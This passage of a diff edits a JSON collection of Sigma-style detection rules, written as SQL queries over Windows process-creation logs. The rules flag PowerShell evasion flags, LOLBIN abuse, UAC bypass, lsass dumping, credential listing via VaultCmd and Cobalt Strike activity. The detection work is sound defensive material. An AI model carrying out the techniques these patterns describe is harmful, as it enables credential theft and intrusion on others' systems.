bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' 
ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ - "attack.t1218.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" ], 
"falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT 
* FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "status": "experimental", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002", + 
"car.2019-04-001" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and 
running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use by an administrator" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE 
'% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", 
+ "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + 
"title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, 
oscd.community", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. 
